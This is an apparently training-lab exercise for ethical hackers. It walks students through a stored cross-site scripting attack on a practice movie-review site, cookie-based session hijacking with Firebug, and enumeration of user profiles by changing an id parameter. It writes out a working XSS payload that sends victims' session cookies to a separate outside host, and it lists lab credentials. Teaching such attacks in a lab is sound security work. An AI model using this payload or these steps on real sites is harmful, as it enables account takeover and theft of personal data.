Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities

Scenario

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored Cross-Site scripting attacks are persistent attacks which are implanted on the target server unless its existence is detected and removed. When an employee in an organization unknowingly becomes victim to this script, attackers gain the session ID corresponding to the victim, and thereby attaining the victim's session without legitimately logging in to the web application. As an Ethical hacker or a Penetration Tester, you need to safeguard a website from executing such malicious scripts and thereby protect the user sessions from being stolen.
The objective of this lab is to help students learn how to:

Test web applications for vulnerabilities
Use Firebug to hijack a session

Lab Duration: 30 Minutes

Click Windows 8.1 (External Network) and click Ctrl+Alt+Delete.
In the password field, click Pa$$w0rd and press Enter.
Launch Firefox web browser, type the URL http://www.moviescope.com in the address bar and press Enter.
moviescope login/home page will appear as shown in the screenshot.
Log in to MovieScope assuming that you are a user. Use the following credentials to log in to the website:
Username: steve
Password: test
You are logged in as a general user and note that you do not have any admin privileges. Click on Blog tab.
Blog page appears; scroll down to Leave a Comment section, enter the following query in the Comment field and click Submit Comment.
<a onclick="document.location='http://www.oceanplaza.com/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>
A comment link will be posted stating “Please click here to visit website” (as we have stated this comment in the query posted in the previous task).

Now, whenever a user who has logged in to the website visits this webpage (Blogwebpage) and clicks on the link, the malicious script running behind the link gets activated, and immediately the cookie value is stored in a file named Mycookies.txt in the location C:\inetpub\wwwroot\oceanplaza\CookieSteal.
Click Windows Server Subnet C and click Ctrl+Alt+Delete.
In the login window, enter the following credentials and press Enter:
User Name: Administrator
Password: Pa$$w0rd
Click on Close button at the top right corner of the Server Manager window.
Launch Firefox browser, type the URL http://www.moviescope.com in the address bar and press Enter.
moviescope login/home page appears as shown in the screenshot.
Assume that you are the admin user and log in to the website using the following credentials:
Username: sam
Password: test
You are logged in as an admin user and you can notice that the webpage displays your role (Admin) adjacent to Logout. Click on Blog tab:
Blog webpage appears on the browser window. Scroll down the page and click Please click here to visit website link.
The admin (victim) is redirected to Default.aspxwebpage of oceanplaza website. Click here link.

In real-time, seeing the blank/unavailable webpage, the user clicks here link to go back to the previous page, being unaware of the fact that an attack has been performed to steal the cookie.
You will be redirected to the Blog webpage of moviescope website as shown in the screenshot.

Do not log out of the website as long as you perform this lab.
Click Windows 8.1 (External Network).
Minimize the web browser, navigate to the location C:\inetpub\wwwroot\oceanplaza\CookieStealand double-click Mycookies.txt file.
The text file contains cookies of the target user's authenticated session as shown in the screenshot.
Switch to the web browser and click View Profiletab. Note that steve is a normal user (here, you) and not an admin.
You will observe that steve’s profile is displayed on the webpage. Now, click Firebug icon located at the top-right corner of the browser window.
Firebug panel appears at the lower end of the screen, click Cookies tab and then click Enablelink.
You will be able to observe a list of cookies. Note that you need to change that cookie value, whose status under Expires tab is mentioned as Session.
Right-click mscope link and select Edit.
As already mentioned, an Edit Cookie pop-up appears; and cookie name (mscope) is constant for the website. Enter the cookie value that you have observed in Mycookies.txt file and click OK.
The cookie value is changed as shown in the screenshot.
Now, refresh the web page and then click powerbutton at the right side corner of the firebug panel to de-activate the firebug add-on.
You will observe that the user name has changed to sam (admin) and you have logged in to his session. Click View Profile tab.
The profile of sam appears as shown in the screenshot.
In Sam's profile page, you will observe that the value of ID in the address bar is 1.
Now, try to change the parameter to id=2 in the address bar, and press Enter.
You will get the profile for John without having to perform any SQL Injection techniques to explore the databases.
Now, change the parameter to id=3 in the address bar and press Enter.
You will get the profile for kety.
This way, you can attempt to change the id number and obtain user profile information.
In this lab, it is evident that:
- The website is vulnerable to stored XSS and
- The cookie value is not encrypted and is available in plain text
- The website is unable to block Parameter Manipulation